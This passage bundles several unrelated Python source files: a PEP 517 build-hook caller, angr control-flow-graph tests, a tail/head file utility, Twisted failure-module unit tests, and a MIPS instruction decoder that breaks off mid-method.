is used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_editable', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_sdist(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.::
["setuptools >= 26"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_sdist', {
'config_settings': config_settings
})
def build_sdist(self, sdist_directory, config_settings=None):
"""Build an sdist from this project.
Returns the name of the newly created file.
This calls the 'build_sdist' backend hook in a subprocess.
"""
return self._call_hook('build_sdist', {
'sdist_directory': abspath(sdist_directory),
'config_settings': config_settings,
})
def _call_hook(self, hook_name, kwargs):
# On Python 2, pytoml returns Unicode values (which is correct) but the
# environment passed to check_call needs to contain string values. We
# convert here by encoding using ASCII (the backend can only contain
# letters, digits and _, . and : characters, and will be used as a
# Python identifier, so non-ASCII content is wrong on Python 2 in
# any case).
# For backend_path, we use sys.getfilesystemencoding.
if sys.version_info[0] == 2:
build_backend = self.build_backend.encode('ASCII')
else:
build_backend = self.build_backend
extra_environ = {'PEP517_BUILD_BACKEND': build_backend}
if self.backend_path:
backend_path = os.pathsep.join(self.backend_path)
if sys.version_info[0] == 2:
backend_path = backend_path.encode(sys.getfilesystemencoding())
extra_environ['PEP517_BACKEND_PATH'] = backend_path
with tempdir() as td:
hook_input = {'kwargs': kwargs}
compat.write_json(hook_input, pjoin(td, 'input.json'),
indent=2)
# Run the hook in a subprocess
with _in_proc_script_path() as script:
python = self.python_executable
self._subprocess_runner(
[python, abspath(str(script)), hook_name, td],
cwd=self.source_dir,
extra_environ=extra_environ
)
data = compat.read_json(pjoin(td, 'output.json'))
if data.get('unsupported'):
raise UnsupportedOperation(data.get('traceback', ''))
if data.get('no_backend'):
raise BackendUnavailable(data.get('traceback', ''))
if data.get('backend_invalid'):
raise BackendInvalid(
backend_name=self.build_backend,
backend_path=self.backend_path,
message=data.get('backend_error', '')
)
if data.get('hook_missing'):
raise HookMissing(data.get('missing_hook_name') or hook_name)
return data['return_val']
class LoggerWrapper(threading.Thread):
"""
Read messages from a pipe and redirect them
to a logger (see python's logging module).
"""
def __init__(self, logger, level):
threading.Thread.__init__(self)
self.daemon = True
self.logger = logger
self.level = level
# create the pipe and reader
self.fd_read, self.fd_write = os.pipe()
self.reader = os.fdopen(self.fd_read)
self.start()
def fileno(self):
return self.fd_write
@staticmethod
def remove_newline(msg):
return msg[:-1] if msg.endswith(os.linesep) else msg
def run(self):
for line in self.reader:
self._write(self.remove_newline(line))
def _write(self, message):
self.logger.log(self.level, message)
|
|
import nose
import angr
import time
import pickle
import networkx
import simuvex
import logging
l = logging.getLogger("angr.tests.test_cfg")
import os
test_location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../binaries/tests'))
def compare_cfg(standard, g, function_list):
"""
Standard graph comes with addresses only, and it is based on instructions, not on basic blocks
"""
def get_function_name(addr):
start = 0
end = len(function_list) - 1
while start <= end:
mid = (start + end) / 2
f = function_list[mid]
if addr < f['start']:
end = mid - 1
elif addr > f['end']:
start = mid + 1
else:
return f['name']
return None
# Sort function list
function_list = sorted(function_list, key=lambda x: x['start'])
# Convert the IDA-style CFG into VEX-style CFG
s_graph = networkx.DiGraph()
all_nodes = sorted(standard.nodes())
addr_to_basicblock = {}
last_basicblock = None
for n in all_nodes:
if last_basicblock is None:
last_basicblock = (n, n)
block = last_basicblock
successors = standard.successors(n)
if len(successors) == 1 and successors[0] >= block[0]:
last_basicblock = (block[0], successors[0])
else:
# Save the existing block
addr_to_basicblock[block[0]] = block
# Create edges
for s in successors:
s_graph.add_edge(block[0], s)
# Clear last_basicblock so that we create a new basicblock next time
last_basicblock = None
graph = networkx.DiGraph()
for src, dst in g.edges():
graph.add_edge(src.addr, dst.addr)
# Graph comparison
for src, dst in s_graph.edges():
if graph.has_edge(src, dst):
continue
else:
# Edge doesn't exist in our CFG
l.error("Edge (%s-0x%x, %s-0x%x) only exists in IDA CFG.", get_function_name(src), src, get_function_name(dst), dst)
for src, dst in graph.edges():
if s_graph.has_edge(src, dst):
continue
else:
# Edge doesn't exist in our CFG
l.error("Edge (%s-0x%x, %s-0x%x) only exists in angr's CFG.", get_function_name(src), src, get_function_name(dst), dst)
def perform_single(binary_path, cfg_path=None):
proj = angr.Project(binary_path,
use_sim_procedures=True,
default_analysis_mode='symbolic',
load_options={'auto_load_libs': False})
start = time.time()
cfg = proj.analyses.CFG(context_sensitivity_level=1)
end = time.time()
duration = end - start
bbl_dict = cfg.get_bbl_dict()
l.info("CFG generated in %f seconds.", duration)
l.info("Contains %d members in BBL dict.", len(bbl_dict))
if cfg_path is not None and os.path.isfile(cfg_path):
# Compare the graph with a predefined CFG
info = pickle.load(open(cfg_path, "rb"))
standard = info['cfg']
functions = info['functions']
graph = cfg.graph
compare_cfg(standard, graph, functions)
else:
l.warning("No standard CFG specified.")
def test_cfg_0():
binary_path = test_location + "/x86_64/cfg_0"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_1():
binary_path = test_location + "/x86_64/cfg_1"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_2():
binary_path = test_location + "/armel/test_division"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_3():
binary_path = test_location + "/mips/test_arrays"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def disabled_cfg_4():
binary_path = test_location + "/mipsel/darpa_ping"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_additional_edges():
# Test the `additional_edges` parameter for CFG generation
binary_path = test_location + "/x86_64/switch"
proj = angr.Project(binary_path,
use_sim_procedures=True,
default_analysis_mode='symbolic',
load_options={'auto_load_libs': False})
additional_edges = {
0x400573 : [ 0x400580, 0x40058f, 0x40059e ]
}
cfg = proj.analyses.CFG(context_sensitivity_level=0, additional_edges=additional_edges)
nose.tools.assert_not_equal(cfg.get_any_node(0x400580), None)
nose.tools.assert_not_equal(cfg.get_any_node(0x40058f), None)
nose.tools.assert_not_equal(cfg.get_any_node(0x40059e), None)
nose.tools.assert_equal(cfg.get_any_node(0x4005ad), None)
def test_not_returning():
# Make sure we are properly labeling functions that do not return in function manager
binary_path = test_location + "/x86_64/not_returning"
proj = angr.Project(binary_path,
use_sim_procedures=True,
load_options={'auto_load_libs': False}
)
proj.analyses.CFG(context_sensitivity_level=0)
# function_a returns
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_a'), None)
nose.tools.assert_true(proj.kb.functions.function(name='function_a').returning)
# function_b does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_b'), None)
nose.tools.assert_false(proj.kb.functions.function(name='function_b').returning)
# function_c does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_c'), None)
nose.tools.assert_false(proj.kb.functions.function(name='function_c').returning)
# main does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='main'), None)
nose.tools.assert_false(proj.kb.functions.function(name='main').returning)
# function_d should not be reachable
nose.tools.assert_equal(proj.kb.functions.function(name='function_d'), None)
def disabled_cfg_5():
binary_path = test_location + "/mipsel/busybox"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_6():
# We need to add DO_CCALLS to resolve long jmp and support real mode
simuvex.o.modes['fastpath'] |= {simuvex.s_options.DO_CCALLS}
binary_path = test_location + "/i386/bios.bin.elf"
proj = angr.Project(binary_path,
use_sim_procedures=True,
load_options={'auto_load_libs': False})
proj.analyses.CFG(context_sensitivity_level=1)
nose.tools.assert_greater_equal(len(proj.kb.functions), 58)
simuvex.o.modes['fastpath'] ^= {simuvex.s_options.DO_CCALLS}
def test_fauxware():
binary_path = test_location + "/x86_64/fauxware"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def disabled_loop_unrolling():
binary_path = test_location + "/x86_64/cfg_loop_unrolling"
p = angr.Project(binary_path)
cfg = p.analyses.CFG()
cfg.normalize()
cfg.unroll_loops(5)
nose.tools.assert_equal(len(cfg.get_all_nodes(0x400636)), 7)
def test_thumb_mode():
# In thumb mode, all addresses of instructions and in function manager should be odd numbers, which loyally
# reflect VEX's trick to encode the THUMB state in the address.
binary_path = test_location + "/armhf/test_arrays"
p = angr.Project(binary_path)
cfg = p.analyses.CFG()
def check_addr(a):
if a % 2 == 1:
nose.tools.assert_true(cfg.is_thumb_addr(a))
else:
nose.tools.assert_false(cfg.is_thumb_addr(a))
# CFGNodes
cfg_node_addrs = [ n.addr for n in cfg.graph.nodes() ]
for a in cfg_node_addrs:
check_addr(a)
# Functions in function manager
for f_addr, f in p.kb.functions.items():
check_addr(f_addr)
if f.startpoint is not None:
check_addr(f.startpoint.addr)
def test_fakeret_edges_0():
# Test the bug where a fakeret edge can be missing in certain cases
# Reported by Attila Axt (GitHub: @axt)
# Ref: https://github.com/angr/angr/issues/72
binary_path = os.path.join(test_location, "x86_64", "cfg_3")
p = angr.Project(binary_path)
cfg = p.analyses.CFGAccurate(context_sensitivity_level=3)
putchar = cfg.functions.function(name="putchar")
# Since context sensitivity is 3, there should be two different putchar nodes
putchar_cfgnodes = cfg.get_all_nodes(putchar.addr)
nose.tools.assert_equal(len(putchar_cfgnodes), 2)
# Each putchar node has a different predecessor as their PLT entry
plt_entry_0 = cfg.get_predecessors(putchar_cfgnodes[0])
nose.tools.assert_equal(len(plt_entry_0), 1)
plt_entry_0 = plt_entry_0[0]
plt_entry_1 = cfg.get_predecessors(putchar_cfgnodes[1])
nose.tools.assert_equal(len(plt_entry_1), 1)
plt_entry_1 = plt_entry_1[0]
nose.tools.assert_true(plt_entry_0 is not plt_entry_1)
# Each PLT entry should have a FakeRet edge
preds_0 = cfg.get_predecessors(plt_entry_0)
nose.tools.assert_equal(len(preds_0), 1)
preds_1 = cfg.get_predecessors(plt_entry_1)
nose.tools.assert_equal(len(preds_1), 1)
# Each predecessor must have a call edge and a FakeRet edge
edges_0 = cfg.get_successors_and_jumpkind(preds_0[0], excluding_fakeret=False)
nose.tools.assert_equal(len(edges_0), 2)
jumpkinds = set([ jumpkind for _, jumpkind in edges_0 ])
nose.tools.assert_set_equal(jumpkinds, { 'Ijk_Call', 'Ijk_FakeRet' })
edges_1 = cfg.get_successors_and_jumpkind(preds_1[0], excluding_fakeret=False)
nose.tools.assert_equal(len(edges_1), 2)
jumpkinds = set([ jumpkind for _, jumpkind in edges_1 ])
nose.tools.assert_set_equal(jumpkinds, { 'Ijk_Call', 'Ijk_FakeRet' })
def run_all():
functions = globals()
all_functions = dict(filter((lambda (k, v): k.startswith('test_')), functions.items()))
for f in sorted(all_functions.keys()):
if hasattr(all_functions[f], '__call__'):
print f
all_functions[f]()
if __name__ == "__main__":
logging.getLogger("simuvex.plugins.abstract_memory").setLevel(logging.DEBUG)
logging.getLogger("angr.surveyors.Explorer").setLevel(logging.DEBUG)
#logging.getLogger("simuvex.plugins.symbolic_memory").setLevel(logging.DEBUG)
logging.getLogger("angr.analyses.cfg").setLevel(logging.DEBUG)
# logging.getLogger("s_irsb").setLevel(logging.DEBUG)
# Temporarily disable the warnings of claripy backend
#logging.getLogger("claripy.backends.backend").setLevel(logging.ERROR)
#logging.getLogger("claripy.claripy").setLevel(logging.ERROR)
import sys
if len(sys.argv) > 1:
globals()['test_' + sys.argv[1]]()
else:
run_all()
|
|
"""
This module provides a Python implementation of functionality of the GNU tail command.
"""
import os
class TailError(Exception):
"""Tail exceptions"""
class TailBase:
"""
Operations to extract the beginning or end of a stream
"""
line_terminators = ('\r\n', '\n', '\r')
def __init__(self, initial_position, read_buffer_size=None):
"""
We have to keep track of the current position we are at.
:read_buffer_size: how many items to read ahead when searching for separators,
if not given read until the end.
"""
self.position_index = initial_position
self.read_size = read_buffer_size
def head(self, number_entries):
"""
Retrieve the first number of entries from the stream
:number_entries: how many items to retrieve
"""
raise NotImplementedError()
def tail(self, number_entries=10):
"""
Retrieve the last number of entries from the stream
:number_entries: how many items to retrieve
"""
raise NotImplementedError()
def seek_line_backwards(self):
"""
Searches backwards from the current position for a line terminator
and seeks to the position of character immediately after it.
:returns: Returns the position immediately after the line separator or None if not found.
"""
pos = end_pos = self.current_position()
read_size = self.read_size
if pos > read_size:
pos -= read_size
else:
pos = 0
read_size = end_pos
self.seek(pos)
bytes_read, read_str = self.read(read_size)
if bytes_read and read_str[-1] in self.line_terminators:
# The last charachter is a line terminator, don't count this one
bytes_read -= 1
if read_str[-2:] == '\r\n' and '\r\n' in self.line_terminators:
# found crlf
bytes_read -= 1
while bytes_read > 0:
# Scan backwards, counting the newlines in the current buffer
i = bytes_read - 1
while i >= 0:
if read_str[i] in self.line_terminators:
self.seek(pos + i + 1)
return self.current_position()
i -= 1
if pos == 0 or pos - self.read_size < 0:
# Not enought lines in the buffer, send the whole file
self.seek(0)
return None
pos -= self.read_size
self.seek(pos)
bytes_read, read_str = self.read(self.read_size)
return None
def seek(self, position):
"""Seek in the underlying data, specalizations to be implemented by derived classes"""
self.position_index = position
def seek_line_forward(self):
"""
Searches forward from the current file position for a line separator
and seeks to the position of character immediately after it.
:returns: Returns the position immediately after the line separator or None if not found.
"""
pos = self.current_position()
bytes_read, read_str = self.read(self.read_size)
start = 0
if bytes_read and read_str[0] in self.line_terminators:
# If the first character is a line terminator skip over it
start += 1
while bytes_read > 0:
# Now we scan forwards,for line terminators in the current buffer
i = start
while i < bytes_read:
if read_str[i] in self.line_terminators:
self.seek(pos + i + 1)
return self.current_position()
i += 1
pos += self.read_size
self.seek(pos)
bytes_read, read_str = self.read(self.read_size)
return None
def read(self, read_size=None):
"""Read from the stream.
:read_size: number of items to read from the current position onwards, if no parameter
is given the default is to read everything from the current position onwards.
:returns: A tuple of the length of the data and the data
"""
raise NotImplementedError()
def current_position(self):
"""Return the current index in the stream
"""
return self.position_index
class FileBasedTail(TailBase):
"""Implement tail operations for a file object"""
def __init__(self, filename, read_buffer_size=1024):
"""
:filename: The name of the file to open
:read_buffer_size: How many bytes to read ahead
"""
self.filename = filename
check_file_validity(self.filename)
self.file_obj = open(filename, 'r')
super().__init__(initial_position=0, read_buffer_size=read_buffer_size)
def head(self, lines=10):
"""
Return the top lines of the file.
:lines: maximum number of lines to extract
"""
self.seek(0)
for _ in range(lines):
if not self.seek_line_forward():
break
end_pos = self.current_position()
self.seek(0)
_, data = self.read(end_pos - 1)
if data:
return data.splitlines()
return []
def tail(self, lines=10):
"""
Get the last number of lines from a file
:lines: the number of lines to take from the end of the file
"""
self.seek_to_end()
end_pos = self.current_position()
for _ in range(lines):
if not self.seek_line_backwards():
break
_, data = self.read(end_pos - self.current_position() - 1)
if data:
return data.splitlines()
return []
def seek(self, position, whence=0):
"""
Seek to position relative to place specified by whence
:position: where to move the filepointer to
:whence: which relative position to use, same as Python's file objects.
0 is beginning of file, 1 is the current position, 2 is end of file position.
"""
self.file_obj.seek(position, whence)
self.position_index = self.file_obj.tell()
def seek_to_end(self):
"""Seek to the end of the file"""
self.seek(0, 2)
def read(self, read_size=None):
"""Read the next read_size bytes from the current file position or all of
the rest of the file if not specified.
"""
if read_size:
data = self.file_obj.read(read_size)
else:
data = self.file_obj.read()
return len(data), data
def current_position(self):
"""Return the current position in the file that the file pointer is pointed at"""
self.position_index = self.file_obj.tell()
return self.position_index
def check_file_validity(filename):
"""Check if a file exists is readable and is a vaild file"""
if not os.access(filename, os.F_OK):
raise TailError("File '{}' does not exist".format(filename))
if not os.access(filename, os.R_OK):
raise TailError("File '{}' is not readable".format(filename))
if os.path.isdir(filename):
raise TailError("'{}' is a directory and not a file".format(filename))
|
|
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for failure module.
"""
import sys
import StringIO
import traceback
from twisted.trial import unittest, util
from twisted.python import failure
try:
from twisted.test import raiser
except ImportError:
raiser = None
class BrokenStr(Exception):
def __str__(self):
raise self
def getDivisionFailure():
try:
1/0
except:
f = failure.Failure()
return f
class FailureTestCase(unittest.TestCase):
def testFailAndTrap(self):
"""Trapping a failure."""
try:
raise NotImplementedError('test')
except:
f = failure.Failure()
error = f.trap(SystemExit, RuntimeError)
self.assertEquals(error, RuntimeError)
self.assertEquals(f.type, NotImplementedError)
def test_notTrapped(self):
"""Making sure trap doesn't trap what it shouldn't."""
try:
raise ValueError()
except:
f = failure.Failure()
self.assertRaises(failure.Failure, f.trap, OverflowError)
def testPrinting(self):
out = StringIO.StringIO()
try:
1/0
except:
f = failure.Failure()
f.printDetailedTraceback(out)
f.printBriefTraceback(out)
f.printTraceback(out)
def testExplictPass(self):
e = RuntimeError()
f = failure.Failure(e)
f.trap(RuntimeError)
self.assertEquals(f.value, e)
def _getInnermostFrameLine(self, f):
try:
f.raiseException()
except ZeroDivisionError:
tb = traceback.extract_tb(sys.exc_info()[2])
return tb[-1][-1]
else:
raise Exception(
"f.raiseException() didn't raise ZeroDivisionError!?")
def testRaiseExceptionWithTB(self):
f = getDivisionFailure()
innerline = self._getInnermostFrameLine(f)
self.assertEquals(innerline, '1/0')
def testLackOfTB(self):
f = getDivisionFailure()
f.cleanFailure()
innerline = self._getInnermostFrameLine(f)
self.assertEquals(innerline, '1/0')
testLackOfTB.todo = "the traceback is not preserved, exarkun said he'll try to fix this! god knows how"
_stringException = "bugger off"
def _getStringFailure(self):
try:
raise self._stringException
except:
f = failure.Failure()
return f
def test_raiseStringExceptions(self):
# String exceptions used to totally bugged f.raiseException
f = self._getStringFailure()
try:
f.raiseException()
except:
self.assertEquals(sys.exc_info()[0], self._stringException)
else:
raise AssertionError("Should have raised")
test_raiseStringExceptions.suppress = [
util.suppress(message='raising a string exception is deprecated')]
def test_printStringExceptions(self):
"""
L{Failure.printTraceback} should write out stack and exception
information, even for string exceptions.
"""
failure = self._getStringFailure()
output = StringIO.StringIO()
failure.printTraceback(file=output)
lines = output.getvalue().splitlines()
# The last line should be the value of the raised string
self.assertEqual(lines[-1], self._stringException)
test_printStringExceptions.suppress = [
util.suppress(message='raising a string exception is deprecated')]
if sys.version_info[:2] >= (2, 6):
skipMsg = ("String exceptions aren't supported anymore starting "
"Python 2.6")
test_raiseStringExceptions.skip = skipMsg
test_printStringExceptions.skip = skipMsg
def testBrokenStr(self):
"""
Formatting a traceback of a Failure which refers to an object
that has a broken __str__ implementation should not cause
getTraceback to raise an exception.
"""
x = BrokenStr()
try:
str(x)
except:
f = failure.Failure()
self.assertEquals(f.value, x)
try:
f.getTraceback()
except:
self.fail("getTraceback() shouldn't raise an exception")
def testConstructionFails(self):
"""
Creating a Failure with no arguments causes it to try to discover the
current interpreter exception state. If no such state exists, creating
the Failure should raise a synchronous exception.
"""
self.assertRaises(failure.NoCurrentExceptionError, failure.Failure)
def test_getTracebackObject(self):
"""
If the C{Failure} has not been cleaned, then C{getTracebackObject}
should return the traceback object that it was given in the
constructor.
"""
f = getDivisionFailure()
self.assertEqual(f.getTracebackObject(), f.tb)
def test_getTracebackObjectFromClean(self):
"""
If the Failure has been cleaned, then C{getTracebackObject} should
return an object that looks the same to L{traceback.extract_tb}.
"""
f = getDivisionFailure()
expected = traceback.extract_tb(f.getTracebackObject())
f.cleanFailure()
observed = traceback.extract_tb(f.getTracebackObject())
self.assertEqual(expected, observed)
def test_getTracebackObjectWithoutTraceback(self):
"""
L{failure.Failure}s need not be constructed with traceback objects. If
a C{Failure} has no traceback information at all, C{getTracebackObject}
should just return None.
None is a good value, because traceback.extract_tb(None) -> [].
"""
f = failure.Failure(Exception("some error"))
self.assertEqual(f.getTracebackObject(), None)
class FindFailureTests(unittest.TestCase):
"""
Tests for functionality related to L{Failure._findFailure}.
"""
def test_findNoFailureInExceptionHandler(self):
"""
Within an exception handler, _findFailure should return
C{None} in case no Failure is associated with the current
exception.
"""
try:
1/0
except:
self.assertEqual(failure.Failure._findFailure(), None)
else:
self.fail("No exception raised from 1/0!?")
def test_findNoFailure(self):
"""
Outside of an exception handler, _findFailure should return None.
"""
self.assertEqual(sys.exc_info()[-1], None) #environment sanity check
self.assertEqual(failure.Failure._findFailure(), None)
def test_findFailure(self):
"""
Within an exception handler, it should be possible to find the
original Failure that caused the current exception (if it was
caused by raiseException).
"""
f = getDivisionFailure()
f.cleanFailure()
try:
f.raiseException()
except:
self.assertEqual(failure.Failure._findFailure(), f)
else:
self.fail("No exception raised from raiseException!?")
def test_failureConstructionFindsOriginalFailure(self):
"""
When a Failure is constructed in the context of an exception
handler that is handling an exception raised by
raiseException, the new Failure should be chained to that
original Failure.
"""
f = getDivisionFailure()
f.cleanFailure()
try:
f.raiseException()
except:
newF = failure.Failure()
self.assertEqual(f.getTraceback(), newF.getTraceback())
else:
self.fail("No exception raised from raiseException!?")
def test_failureConstructionWithMungedStackSucceeds(self):
"""
Pyrex and Cython are known to insert fake stack frames so as to give
more Python-like tracebacks. These stack frames with empty code objects
should not break extraction of the exception.
"""
try:
raiser.raiseException()
except raiser.RaiserException:
f = failure.Failure()
self.assertTrue(f.check(raiser.RaiserException))
else:
self.fail("No exception raised from extension?!")
if raiser is None:
skipMsg = "raiser extension not available"
test_failureConstructionWithMungedStackSucceeds.skip = skipMsg
class TestFormattableTraceback(unittest.TestCase):
"""
Whitebox tests that show that L{failure._Traceback} constructs objects that
can be used by L{traceback.extract_tb}.
If the objects can be used by L{traceback.extract_tb}, then they can be
formatted using L{traceback.format_tb} and friends.
"""
def test_singleFrame(self):
"""
A C{_Traceback} object constructed with a single frame should be able
to be passed to L{traceback.extract_tb}, and we should get a singleton
list containing a (filename, lineno, methodname, line) tuple.
"""
tb = failure._Traceback([['method', 'filename.py', 123, {}, {}]])
# Note that we don't need to test that extract_tb correctly extracts
# the line's contents. In this case, since filename.py doesn't exist,
# it will just use None.
self.assertEqual(traceback.extract_tb(tb),
[('filename.py', 123, 'method', None)])
def test_manyFrames(self):
"""
A C{_Traceback} object constructed with multiple frames should be able
to be passed to L{traceback.extract_tb}, and we should get a list
containing a tuple for each frame.
"""
tb = failure._Traceback([
['method1', 'filename.py', 123, {}, {}],
['method2', 'filename.py', 235, {}, {}]])
self.assertEqual(traceback.extract_tb(tb),
[('filename.py', 123, 'method1', None),
('filename.py', 235, 'method2', None)])
if sys.version_info[:2] >= (2, 5):
from twisted.test.generator_failure_tests import TwoPointFiveFailureTests
|
|
from enum import Enum
import basicTypes
class MainOp(Enum):
J = 2
JAL = 3
BEQ = 4
BNE = 5
BLEZ = 6
BGTZ = 7
ADDI = 8
ADDIU = 9
SLTI = 10
SLTIU = 11
ANDI = 12
ORI = 13
XORI = 14
LUI = 15
BEQL = 20
BNEL = 21
BLEZL = 22
BGTZL = 23
LB = 32
LH = 33
LWL = 34
LW = 35
LBU = 36
LHU = 37
LWR = 38
SB = 40
SH = 41
SWL = 42
SW = 43
SWR = 46
CACHE = 47
LL = 48
LWC1 = 49
LWC2 = 50
PREF = 51
LDC1 = 53
LDC2 = 54
SC = 56
SWC1 = 57
SWC2 = 58
SDC1 = 61
SDC2 = 62
class RegOp(Enum):
SLL = 0
SRL = 2
SRA = 3
SLLV = 4
SRLV = 6
SRAV = 7
JR = 8
JALR = 9
MOVZ = 10
MOVN = 11
SYSCALL = 12
BREAK = 13
SYNC = 15
MFHI = 16
MTHI = 17
MFLO = 18
MTLO = 19
MULT = 24
MULTU = 25
DIV = 26
DIVU = 27
ADD = 32
ADDU = 33
SUB = 34
SUBU = 35
AND = 36
OR = 37
XOR = 38
NOR = 39
SLT = 42
SLTU = 43
class CopOp(Enum):
MFC = 0
CFC = 2
MTC = 4
CTC = 6
BCF = 10
BCT = 11
BCFL = 12
BCTL = 13
class FloatOp(Enum):
ADD = 0
SUB = 1
MUL = 2
DIV = 3
SQRT = 4
ABS = 5
MOV = 6
NEG = 7
ROUND_W = 12
TRUNC_W = 13
CEIL_W = 14
FLOOR_W = 15
CVT_S = 32
CVT_D = 33
CVT_W = 36
C_F = 48
C_UN = 49
C_EQ = 50
C_UEQ = 51
C_OLT = 52
C_ULT = 53
C_OLE = 54
C_ULE = 55
C_SF = 56
C_NGLE = 57
C_SEQ = 58
C_NGL = 59
C_LT = 60
C_NGE = 61
C_LE = 62
C_NGT = 63
class SpecialOp(Enum):
NOP = 0
BLTZ = 10
BGEZ = 11
BLTZL = 12
BGEZL = 13
class Register(Enum):
R0, AT, V0, V1, A0, A1, A2, A3 = range(8)
T0, T1, T2, T3, T4, T5, T6, T7 = range(8, 16)
S0, S1, S2, S3, S4, S5, S6, S7 = range(16, 24)
T8, T9, K0, K1, GP, SP, S8, RA = range(24, 32)
# I'm deeply, deeply sorry for this. I didn't want to require 3.5 just for "start",
# though I guess I'm requiring 3.4 just for enums
class FloatRegister(Enum):
exec(';'.join(('F%s = %s' % (i,i)) for i in range(32)))
SpecialRegister = Enum('SpecialRegister', 'Compare MultLo MultHi')
class Instruction:
branchOPs = set([MainOp[x] for x in "BEQ BNE BLEZ BGTZ BEQL BNEL BLEZL BGTZL".split()] + [CopOp[x] for x in "BCF BCT BCFL BCTL".split()])
J_format = set([MainOp.J,MainOp.JAL])
I_format = set([CopOp.BCF,CopOp.BCT,CopOp.BCFL,CopOp.BCTL])
D_format = set([RegOp.MFLO, RegOp.MFHI])
R_format = set([RegOp.JALR,RegOp.JR,RegOp.MFHI,RegOp.MTHI,RegOp.MFLO,RegOp.MTLO])
RI_format = set([MainOp.LUI, MainOp.BLEZL,MainOp.BGTZL])
SI_format = set([MainOp.BLEZ, MainOp.BGTZ, SpecialOp.BLTZ,SpecialOp.BGEZ,SpecialOp.BLTZL,SpecialOp.BGEZL])
RR_format = set([RegOp.MULT,RegOp.MULTU,RegOp.DIV,RegOp.DIVU])
RRI_format = set([MainOp[x] for x in "BEQ BNE ADDI ADDIU SLTI SLTIU ANDI ORI XORI BEQL BNEL".split()])
RRS_format = set([RegOp[x] for x in "SLL SRL SRA".split()])
RIR_format = set([MainOp[x] for x in "LB LH LWL LW LBU LHU LWR SB SH SWL SW SWR".split()])
RRR_format = set([RegOp[x] for x in "SLLV SRLV SRAV ADD ADDU SUB SUBU AND OR XOR NOR SLT SLTU".split()])
FIR_format = set([MainOp[x] for x in "LWC1 LWC2 LDC1 LDC2 SWC1 SWC2 SDC1 SDC2".split()])
FF_format = set([FloatOp[x] for x in "SQRT ABS MOV NEG ROUND_W TRUNC_W CEIL_W FLOOR_W CVT_S CVT_D CVT_W".split()])
FsF_format = set([FloatOp[x] for x in "C_EQ C_LT C_LE".split()])
FFF_format = set([FloatOp[x] for x in "ADD SUB MUL DIV".split()])
RF_format = set([CopOp.MFC,CopOp.CFC,CopOp.MTC,CopOp.CTC])
def __init__(self, word):
self.raw = word
#________********________********
op = word >> 26 #111111..........................
rs = (word>>21) & 0x1f #......11111.....................
rt = (word>>16) & 0x1f #...........11111................
rd = (word>>11) & 0x1f #................11111...........
imm = word & 0xffff #................1111111111111111
spec = word & 0x3f #..........................111111
try:
self.opcode = MainOp(op)
except ValueError: #need further specification
if op == 0:
if word == 0:
self.opcode = SpecialOp.NOP
return
else:
self.opcode = RegOp(spec)
elif op == 1:
self.opcode = SpecialOp(rt+10)
self.sourceReg = Register(rs)
self.immediate = imm
return
elif op in [16,17,18]:
self.cop = op - 16
if rs == 16:
if self.cop == 0:
raise Exception("cop 0 mostly unimplemented")
elif self.cop == 1:
self.fmt = basicTypes.single
self.opcode = FloatOp(spec)
else:
raise Exception("cop > 1 unimplemented")
elif rs == 17 and self.cop == 1:
self.fmt = basicTypes.double
self.opcode = FloatOp(spec)
elif rs == 20 and spec == 32:
self.fmt = basicTypes.word
self.opcode = FloatOp(spec)
elif rs == 8:
self.opcode = CopOp(((word>>16) & 0x3)+10)
self.target = imm
else:
self.opcode = CopOp(rs)
self.targetReg = Register(rt)
self.fs = FloatRegister(rd)
else:
raise Exception("op " + str(op) + " unimplemented",hex(word))
if isinstance(self.opcode, FloatOp):
self.ft = FloatRegister(rt)
self.fs = FloatRegister(rd)
self.fd = FloatRegister((word>>6) & 0x1f)
elif self.opcode in [MainOp.J, MainOp.JAL]:
self.target = 4*(word & 0x3ffffff)
elif self.opcode in Instruction.FIR_format:
self.sourceReg = Register(rs)
self.targetReg = FloatRegister(rt)
self.immediate = imm
elif isinstance(self.opcode, MainOp):
self.sourceReg = Register(rs)
self.targetReg = Register(rt)
self.immediate = imm
elif self.opcode in [RegOp.SLL,RegOp.SRL,RegOp.SRA]:
self.targetReg = Register(rt)
self.destReg = Register(rd)
self.shift = (word>>6) & 0x1f
elif isinstance(self.opcode, RegOp) or isinstance(self.opcode, CopOp):
self.sourceReg = Register(rs)
self.targetReg = Register(rt)
self.destReg = Register(rd)
elif isinstance(self.opcode, SpecialOp):
pass
else:
raise Exception(str(self.opcode) + " is uncategorized")
def __repr__(self):
return "Instruction(raw = %r, opcode = %r)" % (self.raw, self.opcode)
def __str__(self):
if self.opcode in Instruction.J_format:
return '%s %#X' % (self.opcode.name, self.target)
if self.opcode in Instruction.D_format:
return '%s %s' % (self.opcode.name, self.destReg.name)
if self.opcode in Instruction.R_format:
return '%s %s' % (self.opcode.name, self.sourceReg.name)
if self.opcode in Instruction.I_format:
return '%s%d %#X' % (self.opcode.name, self.cop, self.target)
if self.opcode in Instruction.RI_format:
return '%s %s, %#x' % (self.opcode.name, self.targetReg.name, self.immediate)
if self.opcode in Instruction.SI_format:
return '%s %s, %#x' % (self.opcode.name, self.sourceReg.name, self.immediate)
if self.opcode in Instruction.RR_format:
return '%s %s, %s' % (self.opcode.name, self.sourceReg.name, self.targetReg.name)
if self.opcode in Instruction.RIR_format:
